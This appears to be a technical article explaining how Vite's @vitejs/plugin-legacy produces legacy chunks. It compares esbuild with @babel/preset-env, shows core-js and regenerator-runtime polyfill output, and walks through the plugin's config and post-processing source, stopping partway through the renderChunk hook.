Skip to content

@vitejs/plugin-legacy

Vite Default Browser Support

During development, vite leverages esbuild to compile modules, using esnext as its target specification:

esbuild.ts
ts
// Remove optimization options for dev as we only need to transpile them,
// and for build as the final optimization is in `buildEsbuildPlugin`
export function esbuildPlugin(config: ResolvedConfig): Plugin {
  const filter = createFilter(
    include || /\.(m?ts|[jt]sx)$/,
    exclude || /\.js$/
  );
  const transformOptions: TransformOptions = {
    target: 'esnext',
    charset: 'utf8',
    ...esbuildTransformOptions,
    minify: false,
    minifyIdentifiers: false,
    minifySyntax: false,
    minifyWhitespace: false,
    treeShaking: false,
    // keepNames is not needed when minify is disabled.
    // Also transforming multiple times with keepNames enabled breaks
    // tree-shaking. (#9164)
    keepNames: false,
    supported: {
      ...defaultEsbuildSupported,
      ...esbuildTransformOptions.supported
    }
  };

  return {
    name: 'vite:esbuild',
    async transform(code, id) {
      if (filter(id) || filter(cleanUrl(id))) {
        const result = await transformWithEsbuild(
          code,
          id,
          transformOptions,
          undefined,
          config,
          server?.watcher
        );
      }
    }
  };
}

During the development pre-bundling phase and in production, vite defaults to targeting browsers that are widely available according to Baseline.

ts
import {
  ESBUILD_BASELINE_WIDELY_AVAILABLE_TARGET,
} from '../constants'

async function prepareEsbuildOptimizerRun(
  environment: Environment,
  depsInfo: Record<string, OptimizedDepInfo>,
  processingCacheDir: string,
  optimizerContext: { cancelled: boolean }
): Promise<{
  context?: BuildContext;
  idToExports: Record<string, ExportsData>;
}> {
  const context = await esbuild.context({
    absWorkingDir: process.cwd(),
    entryPoints: Object.keys(flatIdDeps),
    bundle: true,
    platform,
    define,
    format: 'esm',
    // See https://github.com/evanw/esbuild/issues/1921#issuecomment-1152991694
    banner:
      platform === 'node'
        ? {
            js: `import { createRequire } from 'module';const require = createRequire(import.meta.url);`
          }
        : undefined,
    target: ESBUILD_BASELINE_WIDELY_AVAILABLE_TARGET,
    external,
    logLevel: 'error',
    splitting: true,
    sourcemap: true,
    outdir: processingCacheDir,
    ignoreAnnotations: true,
    metafile: true,
    plugins,
    charset: 'utf8',
    ...esbuildOptions,
    supported: {
      ...defaultEsbuildSupported,
      ...esbuildOptions.supported
    }
  });
}
ts
import {
  ESBUILD_BASELINE_WIDELY_AVAILABLE_TARGET
} from './constants';

export const buildEnvironmentOptionsDefaults = Object.freeze({
  target: 'baseline-widely-available'
  // ...
});
export function resolveBuildEnvironmentOptions(
  raw: BuildEnvironmentOptions,
  logger: Logger,
  consumer: 'client' | 'server' | undefined
): ResolvedBuildEnvironmentOptions {
  const merged = mergeWithDefaults(
    {
      ...buildEnvironmentOptionsDefaults,
      cssCodeSplit: !raw.lib,
      minify: consumer === 'server' ? false : 'esbuild',
      ssr: consumer === 'server',
      emitAssets: consumer === 'client',
      createEnvironment: (name, config) =>
        new BuildEnvironment(name, config)
    } satisfies BuildEnvironmentOptions,
    raw
  );
  // handle special build targets
  if (merged.target === 'baseline-widely-available') {
    merged.target = ESBUILD_BASELINE_WIDELY_AVAILABLE_TARGET;
  }
}
ts
/**
 * The browser versions that are included in the Baseline Widely Available on 2025-05-01.
 *
 * This value would be bumped on each major release of Vite.
 *
 * The value is generated by `pnpm generate-target` script.
 */
export const ESBUILD_BASELINE_WIDELY_AVAILABLE_TARGET = [
  'chrome107',
  'edge107',
  'firefox104',
  'safari16'
];

This is also explained in Browser Support.

As you can see, vite adheres to supporting modern browsers. In both development and production, it aims to minimize syntax transpilation as much as possible, leveraging native esm features.

Downgrade Tools

Vite leverages esbuild's capabilities for module transpilation, so the target environment specification specified by the build.target configuration must meet esbuild's requirements.

Esbuild Downgrades Transpilation

esbuild only supports converting most newer JavaScript syntax features to es6(es2015), while keeping es5(es2009) code as es5 code, without performing upgrade processing. This doesn't mean esbuild cannot achieve it, but at this stage es6(2015) is widely used across browsers, so evanw believes implementing downgrade requirements for es6(2015) is not a high priority.

When target is es2015, esbuild will try its best to convert syntax structures to es2015 syntax. It's worth noting that @babel/preset-env itself also performs syntax structure conversion. However, compared to @babel/preset-env, esbuild adopts a more "conservative" conversion strategy, but with fast build speed, suitable for projects with high build performance requirements and relatively modern target environments. The latter adopts a precise and comprehensive syntax structure conversion, suitable for projects that need to support lower version browsers, with higher browser compatibility in syntax structure transpilation work than esbuild.

@babel/preset-env Downgrades Transpilation

@babel/preset-env ensures semantic correctness through complex helper code. While performing downgrade work on syntax structures, it provides support for async/await, generator complex syntax structures (asynchronous syntax) and es6+ new API features through the regenerator-runtime and core-js libraries respectively.

Syntax Structure Transpilation

Babel internally maintains a json map of syntax structure conversion and minimum browser versions through the babel-compat-data package.

json
{
  // ...
  "transform-optional-chaining": {
    "chrome": "91",
    "opera": "77",
    "edge": "91",
    "firefox": "74",
    "safari": "13.1",
    "node": "16.9",
    "deno": "1.9",
    "ios": "13.4",
    "samsung": "16",
    "opera_mobile": "64",
    "electron": "13.0"
  }
  //...
}

When the browser version (target) specified by the consumer is lower than the minimum browser support version in the above map table, @babel/preset-env will automatically transpile the syntax structure.

For example, when target is chrome 90, according to the optional-chaining syntax feature mapping table above, it is not supported in chrome 90, so @babel/preset-env will automatically transpile the syntax structure.

optional-chaining translation example

js
function getUserCity(user) {
  return user?.address?.city;
}
js
function getUserCity(user) {
  var _user$address;

  return user === null || user === void 0
    ? void 0
    : (_user$address = user.address) === null || _user$address === void 0
      ? void 0
      : _user$address.city;
}
ES2015+ APIs Support

Like the former, @babel/preset-env also uses the babel-compat-data package to obtain the json map of es2015+/es6+ new API features and minimum browser version support.

json
{
  "es6.array.copy-within": {
    "chrome": "45",
    "opera": "32",
    "edge": "12",
    "firefox": "32",
    "safari": "9",
    "node": "4",
    "deno": "1",
    "ios": "9",
    "samsung": "5",
    "rhino": "1.7.13",
    "opera_mobile": "32",
    "electron": "0.31"
  }
  // ...
}

When the browser version (target) specified by the consumer is lower than the minimum browser support version in the above map table, @babel/preset-env will inject the core-js subpackage into the output.

For example, when target is chrome 44, according to the array.copyWithin syntax feature mapping table above, it is not supported in chrome 44, so @babel/preset-env will inject the es.array.copy-within subpackage of core-js into the output.

array-copy-within translation example

js
const numbers = [1, 2, 3, 4, 5];
numbers.copyWithin(0, 3);
js
import 'core-js/modules/es.array.copy-within.js';
var numbers = [1, 2, 3, 4, 5];
numbers.copyWithin(0, 3);
Async Runtime Support

When @babel/preset-env processes async/await and generate syntax, @babel/preset-env will first perform syntax structure transpilation, and the intermediate output will include helper functions for generator. If the target provided by the consumer does not support generate syntax, then @babel/preset-env will inject polyfill through regenerator-runtime.

json map.

json
{
  // ...
  "transform-async-to-generator": {
    "chrome": "55",
    "opera": "42",
    "edge": "15",
    "firefox": "52",
    "safari": "11",
    "node": "7.6",
    "deno": "1",
    "ios": "11",
    "samsung": "6",
    "opera_mobile": "42",
    "electron": "1.6"
  }
  // ...
}

When the browser version (target) specified by the consumer is lower than the minimum browser support version in the above map table, then @babel/preset-env will first perform syntax structure transpilation.

For example, when target is chrome 54, according to the transform-async-to-generator syntax feature mapping table above, it is not supported in chrome 54, so @babel/preset-env will inject the runtime.js subpackage of regenerator-runtime into the output.

async-to-generator translation example

js
async function asyncHook() {
  await 1;
}
js
import 'core-js/modules/es.promise.js';

function asyncGeneratorStep(gen, resolve, reject, _next, _throw, key, arg) {
  try {
    var info = gen[key](arg);
    var value = info.value;
  } catch (error) {
    reject(error);
    return;
  }
  if (info.done) {
    resolve(value);
  } else {
    Promise.resolve(value).then(_next, _throw);
  }
}

function _asyncToGenerator(fn) {
  return function () {
    var self = this,
      args = arguments;
    return new Promise(function (resolve, reject) {
      var gen = fn.apply(self, args);
      function _next(value) {
        asyncGeneratorStep(
          gen,
          resolve,
          reject,
          _next,
          _throw,
          'next',
          value
        );
      }
      function _throw(err) {
        asyncGeneratorStep(
          gen,
          resolve,
          reject,
          _next,
          _throw,
          'throw',
          err
        );
      }
      _next(undefined);
    });
  };
}

function asyncHook() {
  return _asyncHook.apply(this, arguments);
}

function _asyncHook() {
  _asyncHook = _asyncToGenerator(function* () {
    yield 1;
  });
  return _asyncHook.apply(this, arguments);
}

From the transpiled output, we can see that when target is chrome 54, @babel/preset-env will transpile the syntax structure and implement the async/await syntax through helper functions for generator.

json map

json
{
  // ...
  "transform-regenerator": {
    "chrome": "50",
    "opera": "37",
    "edge": "13",
    "firefox": "53",
    "safari": "10",
    "node": "6",
    "deno": "1",
    "ios": "10",
    "samsung": "5",
    "opera_mobile": "37",
    "electron": "1.1"
  }
  // ...
}

But when target is chrome 49, @babel/preset-env will perform syntax structure transpilation again, and this time it will inject polyfill through regenerator-runtime to achieve more thorough downgrade.

js
async function asyncHook() {
  await 1;
}
js
import 'regenerator-runtime/runtime.js';
import 'core-js/modules/es.promise.js';

function asyncGeneratorStep(gen, resolve, reject, _next, _throw, key, arg) {
  try {
    var info = gen[key](arg);
    var value = info.value;
  } catch (error) {
    reject(error);
    return;
  }
  if (info.done) {
    resolve(value);
  } else {
    Promise.resolve(value).then(_next, _throw);
  }
}

function _asyncToGenerator(fn) {
  return function () {
    var self = this,
      args = arguments;
    return new Promise(function (resolve, reject) {
      var gen = fn.apply(self, args);
      function _next(value) {
        asyncGeneratorStep(
          gen,
          resolve,
          reject,
          _next,
          _throw,
          'next',
          value
        );
      }
      function _throw(err) {
        asyncGeneratorStep(
          gen,
          resolve,
          reject,
          _next,
          _throw,
          'throw',
          err
        );
      }
      _next(undefined);
    });
  };
}

function asyncHook() {
  return _asyncHook.apply(this, arguments);
}

function _asyncHook() {
  _asyncHook = _asyncToGenerator(
    /*#__PURE__*/ regeneratorRuntime.mark(function _callee() {
      return regeneratorRuntime.wrap(function _callee$(_context) {
        while (1)
          switch ((_context.prev = _context.next)) {
            case 0:
              _context.next = 2;
              return 1;

            case 2:
            case 'end':
              return _context.stop();
          }
      }, _callee);
    })
  );
  return _asyncHook.apply(this, arguments);
}

Downgrade Tools Summary

  1. esbuild

    esbuild adopts a relatively conservative conversion strategy. It mainly downgrades most JavaScript syntax features to es2015(es6), without further downgrading to es2009(es5).

    This decision is based on two considerations:

    1. es2015(es6) is already widely supported across browsers, so the need to downgrade to es2009(es5) has low priority.
    2. Consider transpilation performance first.
    3. Keep code concise, beneficial for readability and debuggability.

    Because of this, esbuild can achieve extremely fast build speeds, especially suitable for projects with high build performance requirements and relatively modern target environments.

  2. @babel/preset-env

    @babel/preset-env provides a more comprehensive and precise conversion solution. Its conversion process can be divided into three main parts:

    1. Syntax Structure Conversion: Through maintaining detailed browser version mapping tables, it automatically decides whether to convert specific syntax structures based on the target environment.

    2. ES2015+ API Support: Also based on browser version mapping tables, but the handling method is to inject relevant submodules of core-js to provide polyfill.

    3. Asynchronous Syntax Support: For asynchronous features like async/await and generate, it adopts a two-layer conversion strategy:

      • First, convert syntax structures like the second step. If the converted syntax structure is not fully supported by the target environment, then introduce regenerator-runtime to provide runtime support.
      • Second, if the target environment supports the transpiled syntax structure, then there's no need to introduce regenerator-runtime.

Comparison between the two:

  1. Conversion Strategy:

    • esbuild: Adopts a "conservative" strategy, focusing on conversion above es2015+ versions.
    • @babel/preset-env: Adopts a "precise and comprehensive" strategy, can precisely convert to any target version.
  2. Performance:

    • esbuild: Known for extremely fast build speeds.
    • @babel/preset-env: Due to the need for more complex conversion and analysis, build speed is relatively slower, and the transpiled output is larger.
  3. Compatibility Support:

    • esbuild: Suitable for projects with relatively modern target environments.
    • @babel/preset-env: Through a complex polyfill system, can support lower version browsers.
  4. Completeness of Conversion:

    • @babel/preset-env will generate complete helper functions and private field implementations to ensure complete functional equivalence.
    • esbuild may adopt simplified conversion schemes, sometimes unable to fully maintain the semantics of the original code.
  5. Usage Scenarios:

    • esbuild: Suitable for modern projects with high build performance requirements and relatively modern target environments.
    • @babel/preset-env: Suitable for projects that need to support a wider range of browsers, especially scenarios that need to be compatible with older version browsers.

From an engineering perspective, the choice of which tool to use should be based on the specific needs of the project: if the project needs to support older browsers, and build performance requirements are not particularly strict, @babel/preset-env is recommended; if the project mainly targets modern browsers, and has high build performance requirements, then esbuild would be a better choice. If the project needs to simultaneously support both older browsers and modern browsers, while also having certain requirements for transpilation performance, then consider using both together to leverage their respective advantages.

esbuild's target is not entirely reliable to a certain extent. Even when configuring target as es2015, esbuild may let some newer version syntax features pass through directly or perform incomplete conversion.

Vite is a development tool that serves applications, so it must consider browser compatibility issues while also having certain requirements for transpilation speed. Therefore, Vite combines the advantages of both, using esbuild to complete syntax transpilation during the build phase, and consumers can use @babel/preset-env to complete syntax feature downgrade if strict browser restrictions are needed.

Polyfill Mechanism

legacy browsers can be supported through the @vitejs/plugin-legacy plugin, which automatically generates legacy chunks and corresponding polyfills for ECMAScript language features. At the same time, legacy chunks will only be loaded on-demand in browsers that don't support native esm.

Balancing Between Optimization And Browser Compatibility

Generally, more modern JavaScript target environments require less transpiled code, because more modern features can be used directly without conversion. When determining the target environment for a project, if possible, choosing a more modern target version can not only reduce the size of the built code but also maintain code readability and maintainability. Of course, this needs to be balanced against the browser support situation of target users.

Syntax Alternatives

To implement downgrade operations for the output, the main downgrade considerations are as follows:

  1. Downgrade of esm loader

    esm can use systemjs for downgrade replacement. systemjs is an esm loader that simulates the loading behavior of browser type=module script tags, with speed close to the browser's native esm loader. It supports TLA, dynamic import, circular references, live bindings, import.meta.url, module types, import-map, integrity, and csp. It's a relatively complete esm loader compatible with older version browsers (ie11).

    So we can downgrade the following high-version browsers that support esm

    html
    <script
      crossorigin
      type="module"
      src="/assets/index-legacy-sCTV4F-O.js"
    ></script>

    to browsers that don't support esm through the following way

    html
    <script
      nomodule
      crossorigin
      id="vite-legacy-entry"
      data-src="/assets/index-legacy-sCTV4F-O.js"
    >
      System.import(
        document.getElementById('vite-legacy-entry').getAttribute('data-src')
      );
    </script>

    The nomodule script tag means scripts that will be executed by browsers that don't support esm, but there are special cases in safari 11 and below versions, which will be explained in detail below.

  2. ECMAScript 2015+ Syntax Downgrade

    @babel/preset-env will be responsible for the downgrade task of es6+ and will transpile syntax features itself.

    js
    // input
    const arrow = () => {};
    
    // transformed
    var arrow = function arrow() {};
    js
    // input
    const { x, y } = point;
    
    // transformed
    var _point = point,
      x = _point.x,
      y = _point.y;
    js
    // input
    const message = `Hello ${name}`;
    
    // transformed
    var message = 'Hello '.concat(name);
    js
    // input
    const value = obj?.prop?.field;
    
    // transformed
    var value =
      (_obj = obj) === null || _obj === void 0
        ? void 0
        : (_obj$prop = _obj.prop) === null || _obj$prop === void 0
          ? void 0
          : _obj$prop.field;

    When encountering new es6+ APIs, it will inject polyfill through core-js.

    js
    // input
    const numbers = [1, 2, 3];
    numbers.includes(2);
    
    // transformed
    import 'core-js/modules/es.array.includes.js';
    var numbers = [1, 2, 3];
    numbers.includes(2);
    js
    // input
    const set = new Set([1, 2, 3]);
    
    // transformed
    import 'core-js/modules/es.array.iterator.js';
    import 'core-js/modules/es.object.to-string.js';
    import 'core-js/modules/es.set.js';
    import 'core-js/modules/es.string.iterator.js';
    import 'core-js/modules/web.dom-collections.iterator.js';
    var set = new Set([1, 2, 3]);
    js
    // input
    const arr = Array.from({});
    
    // transformed
    import 'core-js/modules/es.array.from.js';
    import 'core-js/modules/es.string.iterator.js';
    var arr = Array.from({});
    js
    // input
    const obj = { a: 1, b: 2 };
    Object.entries(obj);
    Object.values(obj);
    
    // transformed
    import 'core-js/modules/es.object.entries.js';
    import 'core-js/modules/es.object.values.js';
    var obj = {
      a: 1,
      b: 2
    };
    Object.entries(obj);
    Object.values(obj);

    When encountering es6+ iterators or async/await features, it will inject polyfill through regenerator-runtime.

    js
    // input
    function* generate() {}
    
    // transformed
    import 'regenerator-runtime/runtime.js';
    
    var _marked = /*#__PURE__*/ regeneratorRuntime.mark(generate);
    
    function generate() {
      return regeneratorRuntime.wrap(function generate$(_context) {
        while (1) {
          switch ((_context.prev = _context.next)) {
            case 0:
            case 'end':
              return _context.stop();
          }
        }
      }, _marked);
    }
    js
    // input
    async function asyncFunction() {
      await 1;
    }
    
    // transformed
    import 'regenerator-runtime/runtime.js';
    import 'core-js/modules/es.object.to-string.js';
    import 'core-js/modules/es.promise.js';
    
    function asyncGeneratorStep(
      gen,
      resolve,
      reject,
      _next,
      _throw,
      key,
      arg
    ) {
      try {
        var info = gen[key](arg);
        var value = info.value;
      } catch (error) {
        reject(error);
        return;
      }
      if (info.done) {
        resolve(value);
      } else {
        Promise.resolve(value).then(_next, _throw);
      }
    }
    
    function _asyncToGenerator(fn) {
      return function () {
        var self = this,
          args = arguments;
        return new Promise(function (resolve, reject) {
          var gen = fn.apply(self, args);
          function _next(value) {
            asyncGeneratorStep(
              gen,
              resolve,
              reject,
              _next,
              _throw,
              'next',
              value
            );
          }
          function _throw(err) {
            asyncGeneratorStep(
              gen,
              resolve,
              reject,
              _next,
              _throw,
              'throw',
              err
            );
          }
          _next(undefined);
        });
      };
    }
    
    function asyncFunction() {
      return _asyncFunction.apply(this, arguments);
    }
    
    function _asyncFunction() {
      _asyncFunction = _asyncToGenerator(
        /*#__PURE__*/ regeneratorRuntime.mark(function _callee() {
          return regeneratorRuntime.wrap(function _callee$(_context) {
            while (1) {
              switch ((_context.prev = _context.next)) {
                case 0:
                  _context.next = 2;
                  return 1;
    
                case 2:
                case 'end':
                  return _context.stop();
              }
            }
          }, _callee);
        })
      );
      return _asyncFunction.apply(this, arguments);
    }

    Through the capabilities of @babel/preset-env, it can more completely downgrade es6+ syntax to es5.

Plugin Work Mechanism

The @vitejs/plugin-legacy plugin will generate legacy chunks for each chunk in the renderChunk phase. It leverages the capabilities of @babel/preset-env to analyze the chunk, and when it finds syntax that is not a syntax feature, it will inject polyfill through core-js or regenerator-runtime.

js
const numbers = [1, 2, 3];
Promise.resolve(1);
function* generate() {}
console.log(numbers.includes(2));
js
import 'regenerator-runtime/runtime.js';

var _marked = /*#__PURE__*/ regeneratorRuntime.mark(generate);

import 'core-js/modules/es.object.to-string.js';
import 'core-js/modules/es.promise.js';
import 'core-js/modules/es.array.includes.js';
var numbers = [1, 2, 3];
Promise.resolve(1);

function generate() {
  return regeneratorRuntime.wrap(function generate$(_context) {
    while (1) {
      switch ((_context.prev = _context.next)) {
        case 0:
        case 'end':
          return _context.stop();
      }
    }
  }, _marked);
}

console.log(numbers.includes(2));

polyfill will be injected on-demand in the form of import statements for core-js submodules and regenerator-runtime modules. Of course, at this point, we can directly bundle the chunks dependency graph from the entry point through the build tool, and through configuration, we can also bundle these on-demand injected polyfill dependencies into a polyfill bundle. This would add some complexity, and the @vitejs/plugin-legacy plugin adopts a simpler implementation approach.

The @babel/preset-env preset will export polyfill submodules of core-js and polyfill modules of regenerator-runtime on-demand while transpiling es6+ code structures. Then we can write a babel plugin to analyze the transpiled chunk after the @babel/preset-env preset execution is complete, and collect polyfill dependencies. After collection is complete, we can delete the imported polyfill statements, and later bundle the collected polyfill modules into a polyfill bundle.

In other words, the polyfill bundle will contain the systemjs runtime and the actual core js polyfills used in the source code.

In the renderChunk phase, it will also analyze the import.meta.env.LEGACY field contained in each chunk and transpile it into a boolean value, used to mark whether the current script's execution environment is a legacy environment.

The final step is to inject the polyfill bundle and legacy bundle into the html. Considering that some browsers may not support type=module script tags, we use the <script nomodule> tag, with the purpose of selectively loading polyfills and executing legacy bundle only in target legacy browsers.

Implementation Approach

The @vitejs/plugin-legacy plugin has three built-in plugins: legacyConfigPlugin, legacyGenerateBundlePlugin, and legacyPostPlugin.

js
// @vitejs/plugin-legacy

function viteLegacyPlugin(options = {}) {
  const legacyConfigPlugin = {
    // ...
  };

  const legacyGenerateBundlePlugin = {
    // ...
  };

  const legacyPostPlugin = {
    // ...
  };

  return [legacyConfigPlugin, legacyGenerateBundlePlugin, legacyPostPlugin];
}

export { cspHashes, viteLegacyPlugin as default, detectPolyfills };

Let's analyze what each plugin does specifically.

legacyConfigPlugin

The plugin will process in the config and configResolved phases.

ts
const genLegacy = options.renderLegacyChunks !== false

// browsers supporting ESM + dynamic import + import.meta + async generator
const modernTargetsEsbuild = [
  'es2020',
  'edge79',
  'firefox67',
  'chrome64',
  'safari12',
]

const legacyConfigPlugin: Plugin = {
  name: 'vite:legacy-config',

  async config(config, env) {
    if (env.command === 'build' && !config.build?.ssr) {
      if (!config.build) {
        config.build = {};
      }

      if (!config.build.cssTarget) {
        // Hint for esbuild that we are targeting legacy browsers when minifying CSS.
        // Full CSS compat table available at https://github.com/evanw/esbuild/blob/78e04680228cf989bdd7d471e02bbc2c8d345dc9/internal/compat/css_table.go
        // But note that only the `HexRGBA` feature affects the minify outcome.
        // HSL & rebeccapurple values will be minified away regardless the target.
        // So targeting `chrome61` suffices to fix the compatibility issue.
        config.build.cssTarget = 'chrome61';
      }

      if (genLegacy) {
        // Vite's default target browsers are **not** the same.
        // See https://github.com/vitejs/vite/pull/10052#issuecomment-1242076461
        overriddenBuildTarget = config.build.target !== undefined;
        overriddenDefaultModernTargets =
          options.modernTargets !== undefined;

        if (options.modernTargets) {
          // Package is ESM only
          const { default: browserslistToEsbuild } = await import(
            'browserslist-to-esbuild'
          );
          config.build.target = browserslistToEsbuild(
            options.modernTargets
          );
        } else {
          config.build.target = modernTargetsEsbuild;
        }
      }
    }

    return {
      define: {
        'import.meta.env.LEGACY':
          env.command === 'serve' || config.build?.ssr
            ? false
            : legacyEnvVarMarker
      }
    };
  },
  configResolved(config) {
    if (overriddenBuildTarget) {
      config.logger.warn(
        colors.yellow(
          `plugin-legacy overrode 'build.target'. You should pass 'targets' as an option to this plugin with the list of legacy browsers to support instead.`
        )
      );
    }
    if (overriddenDefaultModernTargets) {
      config.logger.warn(
        colors.yellow(
          `plugin-legacy 'modernTargets' option overrode the builtin targets of modern chunks. Some versions of browsers between legacy and modern may not be supported.`
        )
      );
    }
  }
};

The implementation logic of this plugin is relatively simple, mainly doing three things:

  1. Set the CSS compatibility version to chrome61 by default.

    When the compatibility scenario is the webview in Android WeChat, it supports most modern JavaScript features, but does not support CSS #RGBA hexadecimal color notation.

    In the above case, we need to set build.cssTarget to chrome61 during the build phase (because versions below chrome 61 don't support #RGBA), to avoid esbuild defaulting to output rgba() colors in hexadecimal notation #RGBA, documentation reference (if the user has already configured it, then no processing is done).

    Here's the explanation and suggestion from the esbuild official:

    Simply put, by default esbuild's output will utilize all modern CSS features, so it will perform syntax transpilation and support for color: rgba() and CSS nesting syntax. If it cannot meet the requirements of the user agent (mostly browsers), then we need to specify a specific build target for esbuild (configurable as build.cssTarget in Vite).

  2. Compatibility Environment Target Retrieval

    Through the capabilities of the browserslist-to-esbuild package, it will look up the browserslist configuration required by the project in package.json or .browserslistrc and assign it to config.build.target.

  3. import.meta.env.LEGACY Marker Injection

    Globally inject the import.meta.env.LEGACY constant with the value __VITE_IS_LEGACY__, which only takes effect in the build phase. The renderChunk phase will replace it with a known boolean value, and it is invalid in the dev and ssr phases.

legacyPostPlugin

The source code structure is as follows. It can be seen that in the post phase of the build, five hooks are exposed: renderStart, configResolved, renderChunk, transformIndexHtml, and generateBundle.

js
const legacyPostPlugin = {
  name: 'vite:legacy-post-process',
  enforce: 'post',
  apply: 'build',
  renderStart() {
    // ...
  },
  configResolved(_config) {
    // ...
  },
  async renderChunk(raw, chunk, opts) {
    // ...
  },
  transformIndexHtml(html, { chunk }) {
    // ...
  },
  generateBundle(opts, bundle) {
    // ...
  }
};

Configuration Inform

In the configResolved hook, it will not process lib, ssr mode, and scenarios where the configuration does not need to generate legacy output (options.renderLegacyChunks === false).

ts
const genLegacy = options.renderLegacyChunks !== false;
if (_config.build.lib) {
  throw new Error('@vitejs/plugin-legacy does not support library mode.');
}
config = _config;

modernTargets = options.modernTargets || modernTargetsBabel;
if (isDebug) {
  console.log(`[@vitejs/plugin-legacy] modernTargets:`, modernTargets);
}

if (!genLegacy || config.build.ssr) {
  return;
}

If no target is provided for the plugin, then the plugin will use the capabilities of the browserslist package to obtain the target browser versions needed for downgrade.

ts
/**
 * 1. Get the configuration items in package.json under the root directory.
 * config = module[package.json]
 * 2. Parse the configuration items in package.json
 * return (
 *  config[process.env.BROWSERSLIST_ENV] ||
 *  config[process.env.NODE_ENV] ||
 *  config["production"] ||
 *  config.defaults
 * )
 */
targets =
  options.targets ||
  browserslistLoadConfig({ path: config.root }) ||
  'last 2 versions and not dead, > 0.3%, Firefox ESR';

According to the configuration items of rollupOptions.output, determine the output filename for legacy output.

ts
const genModern = options.renderModernChunks !== false;
const { rollupOptions } = config.build;
const { output } = rollupOptions;
if (Array.isArray(output)) {
  rollupOptions.output = [
    ...output.map(createLegacyOutput),
    ...(genModern ? output : [])
  ];
} else {
  rollupOptions.output = [
    createLegacyOutput(output),
    ...(genModern ? [output || {}] : [])
  ];
}

Each entry will generate a corresponding legacy output, and it will decide whether to generate modern output (non-legacy output) based on the value of genModern.

ts
const createLegacyOutput = (options: OutputOptions = {}): OutputOptions => {
  return {
    ...options,
    format: 'system',
    entryFileNames: getLegacyOutputFileName(options.entryFileNames),
    chunkFileNames: getLegacyOutputFileName(options.chunkFileNames)
  };
};

Note that the output format for legacy is system, which is a special output format that rollup will process specially. At the same time, we can also distinguish between legacy chunk and modern chunk by checking the output format of legacy chunk later.

system format

rollup supports the system output format, which means rollup implements the downgrade of esm through systemjs. The transpiled output will be wrapped by systemjs, so legacy chunk will include the systemjs runtime.

Before transpilation:

ts
console.log(1);

After transpilation:

ts
System.register([], function () {
  'use strict';
  return {
    execute() {
      console.log(1);
    }
  };
});

The naming rules for legacy output are as follows:

ts
const getLegacyOutputFileName = (
  fileNames: string | ((chunkInfo: PreRenderedChunk) => string) | undefined,
  defaultFileName = '[name]-legacy-[hash].js'
): string | ((chunkInfo: PreRenderedChunk) => string) => {
  if (!fileNames) {
    return path.posix.join(config.build.assetsDir, defaultFileName);
  }

  return chunkInfo => {
    let fileName =
      typeof fileNames === 'function' ? fileNames(chunkInfo) : fileNames;

    if (fileName.includes('[name]')) {
      // [name]-[hash].[format] -> [name]-legacy-[hash].[format]
      fileName = fileName.replace('[name]', '[name]-legacy');
    } else if (nonLeadingHashInFileNameRE.test(fileName)) {
      // custom[hash].[format] -> [name]-legacy[hash].[format]
      // custom-[hash].[format] -> [name]-legacy-[hash].[format]
      // custom.[hash].[format] -> [name]-legacy.[hash].[format]
      // custom.[hash:10].[format] -> custom-legacy.[hash:10].[format]
      fileName = fileName.replace(prefixedHashInFileNameRE, '-legacy$&');
    } else {
      // entry.js -> entry-legacy.js
      // entry.min.js -> entry-legacy.min.js
      fileName = fileName.replace(/(.+?)\.(.+)/, '$1-legacy.$2');
    }

    return fileName;
  };
};

The source code comments have already given detailed comments, so I won't repeat them here.

The complete code for the configResolved hook of legacyPostPlugin is as follows:

ts
const legacyPostPlugin: Plugin = {
  name: 'vite:legacy-post-process',
  enforce: 'post',
  apply: 'build',

  configResolved(_config) {
    if (_config.build.lib) {
      throw new Error(
        '@vitejs/plugin-legacy does not support library mode.'
      );
    }
    config = _config;

    modernTargets = options.modernTargets || modernTargetsBabel;
    if (isDebug) {
      console.log(`[@vitejs/plugin-legacy] modernTargets:`, modernTargets);
    }

    if (!genLegacy || config.build.ssr) {
      return;
    }

    targets =
      options.targets ||
      browserslistLoadConfig({ path: config.root }) ||
      'last 2 versions and not dead, > 0.3%, Firefox ESR';
    if (isDebug) {
      console.log(`[@vitejs/plugin-legacy] targets:`, targets);
    }

    const getLegacyOutputFileName = (
      fileNames:
        | string
        | ((chunkInfo: PreRenderedChunk) => string)
        | undefined,
      defaultFileName = '[name]-legacy-[hash].js'
    ): string | ((chunkInfo: PreRenderedChunk) => string) => {
      if (!fileNames) {
        return path.posix.join(config.build.assetsDir, defaultFileName);
      }

      return chunkInfo => {
        let fileName =
          typeof fileNames === 'function'
            ? fileNames(chunkInfo)
            : fileNames;

        if (fileName.includes('[name]')) {
          // [name]-[hash].[format] -> [name]-legacy-[hash].[format]
          fileName = fileName.replace('[name]', '[name]-legacy');
        } else if (nonLeadingHashInFileNameRE.test(fileName)) {
          // custom[hash].[format] -> [name]-legacy[hash].[format]
          // custom-[hash].[format] -> [name]-legacy-[hash].[format]
          // custom.[hash].[format] -> [name]-legacy.[hash].[format]
          // custom.[hash:10].[format] -> custom-legacy.[hash:10].[format]
          fileName = fileName.replace(
            prefixedHashInFileNameRE,
            '-legacy$&'
          );
        } else {
          // entry.js -> entry-legacy.js
          // entry.min.js -> entry-legacy.min.js
          fileName = fileName.replace(/(.+?)\.(.+)/, '$1-legacy.$2');
        }

        return fileName;
      };
    };

    const createLegacyOutput = (
      options: OutputOptions = {}
    ): OutputOptions => {
      return {
        ...options,
        format: 'system',
        entryFileNames: getLegacyOutputFileName(options.entryFileNames),
        chunkFileNames: getLegacyOutputFileName(options.chunkFileNames)
      };
    };

    const { rollupOptions } = config.build;
    const { output } = rollupOptions;
    if (Array.isArray(output)) {
      rollupOptions.output = [
        ...output.map(createLegacyOutput),
        ...(genModern ? output : [])
      ];
    } else {
      rollupOptions.output = [
        createLegacyOutput(output),
        ...(genModern ? [output || {}] : [])
      ];
    }
  }
};

RenderChunk Hook's Focus

The renderChunk hook does not handle ssr mode.

ts
const legacyPostPlugin: Plugin = {
  name: 'vite:legacy-post-process',
  enforce: 'post',
  apply: 'build',
  async renderChunk(raw, chunk, opts, { chunks }) {
    if (config.build.ssr) {
      return null;
    }
  }
};

Initialize the storage object of polyfills.

ts
// On first run, intialize the map with sorted chunk file names
let chunkFileNameToPolyfills = outputToChunkFileNameToPolyfills.get(opts);
if (chunkFileNameToPolyfills == null) {
  chunkFileNameToPolyfills = new Map();
  for (const fileName in chunks) {
    chunkFileNameToPolyfills.set(fileName, {
      modern: new Set(),
      legacy: new Set()
    });
  }
  outputToChunkFileNameToPolyfills.set(opts, chunkFileNameToPolyfills);
}
const polyfillsDiscovered = chunkFileNameToPolyfills.get(chunk.fileName);
